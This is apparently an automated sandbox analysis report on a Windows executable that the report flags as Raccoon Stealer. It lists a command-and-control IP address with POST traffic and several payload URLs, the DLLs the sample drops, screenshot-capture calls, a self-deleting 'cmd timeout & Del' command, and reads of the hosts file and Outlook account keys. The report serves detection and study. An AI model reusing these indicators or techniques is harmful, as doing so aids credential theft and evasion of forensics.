  Data Raw (a ZIP archive: the body opens with the local file header 50 4b 03 04 and the first entry name is nssdbm3.dll, one of the NSS DLLs listed among the dropped files above): 50 4b 03 04 14 00 00 00 08 00 9a 7a 6e 4e 3c 09 f8 7b 72 d2 00 00 d0 69 01 00 0b 00 00 00 6e 73 73 64 62 6d 33 2e 64 6c 6c ec fd 7f 7c 14 d5 d5 38 00 cf ee 4e 92 0d 59 d8 05 36 18 24 4a 90 a0 d1 a0 06 16 24 31 80 d9 84 dd 44 20 b0 61 c9 2e 11 13 b4 6a 4c b7 56 f9 b1 43 b0 12 08 4e 02 3b 19 b7 f5 e9 a3 7d ec 2f ab f5 f1 e9 0f db a7 b6 b5 80 d5 ea 86 d8 24 f8 13 81 5a 2c 54 a3 52 bd 71 63 8d 92 86 45 63 e6 3d e7 dc 99 dd 0d da ef f7 fb be 7f bf f0 c9 ec cc dc 3b f7 9e 7b ee b9 e7 9e 73 ee b9 e7 d6 de 70 bf 60 11 04 41 84 3f 4d 13 84 83 02 ff 57 21 fc df ff e5 99 04 61 ca ec 3f 4e 11 9e ca 7e 65 ce 41 d3 ea 57 e6 ac 6f f9 fa b6 82 cd 5b ef ba 7d eb cd df 2c b8 e5 e6 3b ef bc 2b 5c f0 b5 db 0a b6 4a 77 16 7c fd ce 82 15 6b fd 05 df bc eb d6 db ae 9a 3c 79 52 a1 5e c6 45 07 6f 18 6e 78 73 d1 63 c6 9f ef d1 9f 3d 56 0f bf ed cf 2c fe e9 46 f8 ed bb fb cc 63 75 f4 bc e4 a7 1b e8 77 c1 4f fd f4 5b f2 d3 75 f0 7b cf d3 3c df 77 ff b8 f8 a7 37 50 19 8b 1f 7b 91 9e 4b 7e ea a6 df 45 f4 dd 77 ff f8 d2 63 fc f7 1a 7a 5e f7 f5 5b 5a b0 be 7f d7 36 9f 47 10 56 9b 32 84 e7 2b ba 6e 34 de 0d 08 97 cc c9 31 4d c9 11 2e 84 86 97 f0 77 7b 66 c3 bd 03 6e 4a 4c f8 e8 a0 7b b3 20 64 0a f4 9c fc 15 da 4d 84 e4 2b b6 98 20 b9 82 7f e4 10 84 d4 2f ff 29 b8 ce 24 58 21 b5 08 b2 f4 e3 cb 9b 4c c2 0e 4b 1a 60 ab 4d c2 91 8b e0 77 b3 49 f8 ef 4c 41 38 72 ad 49 58 ff 7f e8 a3 a2 72 d3 c4 be 04 38 37 98 ff 7d fe ab c2 b7 ed 08 c3 ef e9 3c bd 5d 17 72 b8 d3 ff 15 00 54 57 6d bd f5 e6 f0 cd 82 b0 62 36 2f 13 5f 0a 17 9b d2 b3 61 bd 15 57 f1 6c 42 02 db e0 33 11 6e 84 e5 5f ca 17 bb 6a eb b6 ad b7 08 02 6f eb 4d 7a 9d 15 5f 51 de d6 db ee b8 eb 16 81 da 8e 38 10 ac f0 bb e2 4b f9 2a 85 ff ff bf ff a7 7f f5 ea 90 bc ac c8 67 72 08 e1 4c b9 cd 2a 48 2e b5 d6 76 b6 fb 8b 84 36 5b 2a 92 bf e9 34 49 97 a8 dd 7b de 31 67 09 c2 3c 1c 02 3e 4d ca d3 24 47 9d 26 59 d9 8b d0 f7 f2 0b ce c6 1e 2d f7 a1 12 93 a3 4f 98 01 39 5c b1 c6 1e 2c 74 c8 e1 57 1b 6d ae 58 20 a8 b6 59 d5 33 ea 2a 87 e2 19 53 3c 23 7d 1e 22 85 3e cf 30 52 42 67 2c 9c 1d b2 6c 68 2e 73 8b e1 6f d8 0f b8 c5 e6 72 cf 70 38 13 ae 09 29 bf cf 33 82 1d 4b 0f 76 fb 01 93 eb 64 73 d9 8d 6e 33 14 2b 5d 07 8f f6 03 2b dc e3 ae c3 ed 6b 72 4d 75 01 5f 90 59 5c 82 a0 0e cb 2f 38 54 cf 18 96 0b af 06 26 0b 42 43 83 22 8d 75 8e da 3b be 0f 65 a9 6b 20 75 24 1e 81 cf 15 8f cd 7e 60 bd 7b 1c 21 ab 4d c8 09 f3 ae 5c 57 ac 59 a9 33 37 2b 6e 51 f5 5a 95 2a ab ea b1 c5 33 5c 47 15 bf 35 64 be a1 f8 90 5a 9f 68 56 4c cd ea 5a 1b 7c 6b 89 35 17 f7 ab 58 46 ac 59 1e cc 6c 56 56 57 9a d5 43 98 d8 7c bd fd 80 80 cf 62 fb aa 5c 93 5a 0f 95 87 6d 81 20 f3 03 30 f0 d4 d0 50 fe 46 38 7b 5d 90 55 11 70 da da 52 57 2c 6e 91 fb b5 4d 4d 1b d5 7f e8 c8 73 aa 1e c2 5f 40 b5 aa 3e 51 dd 08 20 8e a8
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.100 (50 identical entries)
Source: 31cGYywxgy.exe, 00000000.00000002.282856715.0000000002D2D000.00000004.00000001.sdmp String found in binary or memory: http://194.180.174.100/
Source: 31cGYywxgy.exe, 00000000.00000002.282340481.0000000000738000.00000004.00000001.sdmp String found in binary or memory: http://194.180.174.100//l/f/G5GYJXwB3dP17Spz8m-L/70e760d32c85dd68bb76b7cf4f9d65a400d87d16
Source: 31cGYywxgy.exe, 00000000.00000002.282340481.0000000000738000.00000004.00000001.sdmp String found in binary or memory: http://194.180.174.100//l/f/G5GYJXwB3dP17Spz8m-L/70e760d32c85dd68bb76b7cf4f9d65a400d87d167
Source: 31cGYywxgy.exe, 00000000.00000002.282340481.0000000000738000.00000004.00000001.sdmp String found in binary or memory: http://194.180.174.100//l/f/G5GYJXwB3dP17Spz8m-L/70e760d32c85dd68bb76b7cf4f9d65a400d87d16T
Source: 31cGYywxgy.exe, 00000000.00000002.282340481.0000000000738000.00000004.00000001.sdmp String found in binary or memory: http://194.180.174.100//l/f/G5GYJXwB3dP17Spz8m-L/d9a87544924531ef155dbccfe1a04e27038ca861
Source: 31cGYywxgy.exe, 00000000.00000002.282340481.0000000000738000.00000004.00000001.sdmp String found in binary or memory: http://194.180.174.100//l/f/G5GYJXwB3dP17Spz8m-L/d9a87544924531ef155dbccfe1a04e27038ca861ata
Source: 31cGYywxgy.exe, 00000000.00000003.276042748.0000000002D2A000.00000004.00000001.sdmp String found in binary or memory: http://194.180.174.100/Pv
Source: qipcap.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: qipcap.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: nssckbi.dll.0.dr String found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
Source: nssckbi.dll.0.dr String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: nssckbi.dll.0.dr String found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
Source: nssckbi.dll.0.dr String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: nssckbi.dll.0.dr String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: nssckbi.dll.0.dr String found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl0
Source: 31cGYywxgy.exe, 00000000.00000002.282340481.0000000000738000.00000004.00000001.sdmp, nssckbi.dll.0.dr String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: nssckbi.dll.0.dr String found in binary or memory: http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0
Source: nssckbi.dll.0.dr String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: nssckbi.dll.0.dr String found in binary or memory: http://crl.securetrust.com/SGCA.crl0
Source: nssckbi.dll.0.dr String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: qipcap.dll.0.dr String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: nssckbi.dll.0.dr String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: qipcap.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: qipcap.dll.0.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: qipcap.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: qipcap.dll.0.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: nssckbi.dll.0.dr String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
Source: nssckbi.dll.0.dr String found in binary or memory: http://ocsp.accv.es0
Source: qipcap.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: qipcap.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: qipcap.dll.0.dr String found in binary or memory: http://ocsp.thawte.com0
Source: nssckbi.dll.0.dr String found in binary or memory: http://policy.camerfirma.com0
Source: nssckbi.dll.0.dr String found in binary or memory: http://repository.swisssign.com/0
Source: qipcap.dll.0.dr String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: qipcap.dll.0.dr String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: qipcap.dll.0.dr String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: nssckbi.dll.0.dr String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
Source: nssckbi.dll.0.dr String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
Source: nssckbi.dll.0.dr String found in binary or memory: http://www.accv.es/legislacion_c.htm0U
Source: nssckbi.dll.0.dr String found in binary or memory: http://www.accv.es00
Source: nssckbi.dll.0.dr String found in binary or memory: http://www.cert.fnmt.es/dpcs/0
Source: nssckbi.dll.0.dr String found in binary or memory: http://www.certicamara.com/dpc/0Z
Source: nssckbi.dll.0.dr String found in binary or memory: http://www.certplus.com/CRL/class2.crl0
Source: nssckbi.dll.0.dr String found in binary or memory: http://www.chambersign.org1
Source: nssckbi.dll.0.dr String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: nssckbi.dll.0.dr String found in binary or memory: http://www.firmaprofesional.com/cps0
Source: mozglue.dll.0.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: qipcap.dll.0.dr String found in binary or memory: http://www.mozilla.com0
Source: nssckbi.dll.0.dr String found in binary or memory: http://www.pkioverheid.nl/policies/root-policy-G20
Source: nssckbi.dll.0.dr String found in binary or memory: http://www.quovadis.bm0
Source: nssckbi.dll.0.dr String found in binary or memory: http://www.quovadisglobal.com/cps0
Source: nssckbi.dll.0.dr String found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
Source: 31cGYywxgy.exe, 00000000.00000002.282856715.0000000002D2D000.00000004.00000001.sdmp String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord
Source: 31cGYywxgy.exe, 00000000.00000002.282340481.0000000000738000.00000004.00000001.sdmp String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4842492154761;g
Source: 31cGYywxgy.exe, 00000000.00000002.282856715.0000000002D2D000.00000004.00000001.sdmp String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=58648497779
Source: 31cGYywxgy.exe, 00000000.00000002.282340481.0000000000738000.00000004.00000001.sdmp String found in binary or memory: https://contextual.media.net/checksync.php&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C
Source: 31cGYywxgy.exe, 00000000.00000002.282340481.0000000000738000.00000004.00000001.sdmp String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: 31cGYywxgy.exe, 00000000.00000002.282842619.0000000002D20000.00000004.00000001.sdmp String found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
Source: nssckbi.dll.0.dr String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: nssckbi.dll.0.dr String found in binary or memory: https://repository.luxtrust.lu0
Source: 31cGYywxgy.exe, 00000000.00000002.282856715.0000000002D2D000.00000004.00000001.sdmp String found in binary or memory: https://t..180.174.100/
Source: 31cGYywxgy.exe, 00000000.00000002.282842619.0000000002D20000.00000004.00000001.sdmp String found in binary or memory: https://t.me/agrybirdsgamerept
Source: 31cGYywxgy.exe, 00000000.00000002.282842619.0000000002D20000.00000004.00000001.sdmp String found in binary or memory: https://telegram.org/img/t_logo.png
Source: nssckbi.dll.0.dr String found in binary or memory: https://www.catcert.net/verarrel
Source: nssckbi.dll.0.dr String found in binary or memory: https://www.catcert.net/verarrel05
Source: qipcap.dll.0.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: 31cGYywxgy.exe, 00000000.00000002.282856715.0000000002D2D000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
Source: 31cGYywxgy.exe, 00000000.00000002.282856715.0000000002D2D000.00000004.00000001.sdmp String found in binary or memory: https://www.microsoft.c
Source: unknown HTTP traffic detected:
  POST / HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  Content-Type: text/plain; charset=UTF-8
  Content-Length: 128
  Host: 194.180.174.100
Source: unknown DNS traffic detected: queries for: t.me

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to record screenshots
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_0042C157 __EH_prolog,GdiplusStartup,GetDesktopWindow,GetWindowRect,GetWindowDC,GetDeviceCaps,CreateCompatibleDC,CreateDIBSection,DeleteDC,DeleteDC,DeleteDC,SaveDC,SelectObject,BitBlt,RestoreDC,DeleteDC,DeleteDC,DeleteDC,GdipAlloc,GdipCreateBitmapFromHBITMAP,_mbstowcs,GdipSaveImageToFile,DeleteObject,GdiplusShutdown, 0_2_0042C157

E-Banking Fraud:

Yara detected Raccoon Stealer
Source: Yara match File source: 0.2.31cGYywxgy.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.31cGYywxgy.exe.2220000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.31cGYywxgy.exe.2120e50.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.31cGYywxgy.exe.2220000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.31cGYywxgy.exe.2120e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.31cGYywxgy.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.257211865.0000000002220000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.282454454.0000000002120000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 31cGYywxgy.exe PID: 3104, type: MEMORYSTR

System Summary:

Uses 32bit PE files
Source: 31cGYywxgy.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
Detected potential crypto function
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_0043E2E4 0_2_0043E2E4
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_0042A2F9 0_2_0042A2F9
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_0043628C 0_2_0043628C
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_0042C383 0_2_0042C383
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_004206DD 0_2_004206DD
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_004210B1 0_2_004210B1
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_004373C6 0_2_004373C6
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_00437819 0_2_00437819
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_0041FD36 0_2_0041FD36
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_0041E014 0_2_0041E014
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_0042E110 0_2_0042E110
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_0040E139 0_2_0040E139
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_0044A480 0_2_0044A480
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_0045A4BD 0_2_0045A4BD
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_004484BA 0_2_004484BA
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_0045A5DD 0_2_0045A5DD
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_00410648 0_2_00410648
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_0046475B 0_2_0046475B
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_004187EC 0_2_004187EC
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_0041E857 0_2_0041E857
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: String function: 0044F0F9 appears 31 times
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: String function: 00467790 appears 65 times
PE file does not import any functions
Source: api-ms-win-core-processenvironment-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-interlocked-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-util-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-stdio-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-private-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-process-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-timezone-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l2-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-string-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-handle-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-2-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-profile-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-localization-l1-2-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-math-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-locale-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-time-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-1.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-utility-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-namedpipe-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-filesystem-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-multibyte-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-rtlsupport-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-conio-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-heap-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-convert-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-runtime-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-string-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-2-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-sysinfo-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-memory-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-libraryloader-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-heap-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-environment-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Sample file is different than original file name gathered from version info
Source: 31cGYywxgy.exe, 00000000.00000002.282990135.000000006E822000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamemozglue.dll8 vs 31cGYywxgy.exe
Source: 31cGYywxgy.exe, 00000000.00000002.283168894.000000006E95B000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamenss3.dll8 vs 31cGYywxgy.exe
PE file contains strange resources
Source: 31cGYywxgy.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 31cGYywxgy.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 31cGYywxgy.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 31cGYywxgy.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLs
Source: C:\Users\user\Desktop\31cGYywxgy.exe Section loaded: sqlite3.dll
Source: 31cGYywxgy.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 31cGYywxgy.exe ReversingLabs: Detection: 40%
Source: 31cGYywxgy.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\31cGYywxgy.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\31cGYywxgy.exe 'C:\Users\user\Desktop\31cGYywxgy.exe'
Source: C:\Users\user\Desktop\31cGYywxgy.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\Desktop\31cGYywxgy.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /T 10 /NOBREAK
Source: C:\Users\user\Desktop\31cGYywxgy.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\Desktop\31cGYywxgy.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /T 10 /NOBREAK
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\sqlite3.dll
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@6/62@1/2
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_0042A224 CoCreateInstance,StrStrIW,CoTaskMemFree,CoTaskMemFree, 0_2_0042A224
Source: softokn3.dll.0.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: 31cGYywxgy.exe, 00000000.00000002.283125621.000000006E920000.00000002.00020000.sdmp, nss3.dll.0.dr Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: softokn3.dll.0.dr Binary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
Source: softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: 31cGYywxgy.exe, 00000000.00000002.283125621.000000006E920000.00000002.00020000.sdmp, nss3.dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: 31cGYywxgy.exe, 00000000.00000002.283125621.000000006E920000.00000002.00020000.sdmp, nss3.dll.0.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);docid INTEGER PRIMARY KEY%z, 'c%d%q'%z, langidCREATE TABLE %Q.'%q_content'(%s)CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);<
Source: 31cGYywxgy.exe, 00000000.00000002.283125621.000000006E920000.00000002.00020000.sdmp, nss3.dll.0.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: 31cGYywxgy.exe, 00000000.00000002.283125621.000000006E920000.00000002.00020000.sdmp, nss3.dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3.dll.0.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3.dll.0.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3.dll.0.dr Binary or memory string: SELECT ALL id FROM %s;
Source: softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3.dll.0.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: 31cGYywxgy.exe, 00000000.00000002.283125621.000000006E920000.00000002.00020000.sdmp, nss3.dll.0.dr Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: 31cGYywxgy.exe, 00000000.00000002.283125621.000000006E920000.00000002.00020000.sdmp, nss3.dll.0.dr Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: 31cGYywxgy.exe, 00000000.00000002.283125621.000000006E920000.00000002.00020000.sdmp, nss3.dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: 31cGYywxgy.exe, 00000000.00000002.283125621.000000006E920000.00000002.00020000.sdmp, nss3.dll.0.dr Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
Source: 31cGYywxgy.exe, 00000000.00000002.283125621.000000006E920000.00000002.00020000.sdmp, nss3.dll.0.dr Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: 31cGYywxgy.exe, 00000000.00000002.283125621.000000006E920000.00000002.00020000.sdmp, nss3.dll.0.dr Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);/overflow%s%.3x+%.6x%s%.3x/internalleafcorruptedno such schema: %sSELECT 'sqlite_master' AS name, 1 AS rootpage, 'table' AS type UNION ALL SELECT name, rootpage, type FROM "%w".%s WHERE rootpage!=0 ORDER BY namedbstat2018-01-22 18:45:57 0c55d179733b46d8d0ba4d88e01a25e10677046ee3da1d5b1581e86726f2171d:
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6540:120:WilError_01
Source: C:\Users\user\Desktop\31cGYywxgy.exe Mutant created: \Sessions\1\BaseNamedObjects\user5L1M3_noturbusiness
Source: C:\Users\user\Desktop\31cGYywxgy.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\31cGYywxgy.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\31cGYywxgy.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager
Source: C:\Users\user\Desktop\31cGYywxgy.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: 31cGYywxgy.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
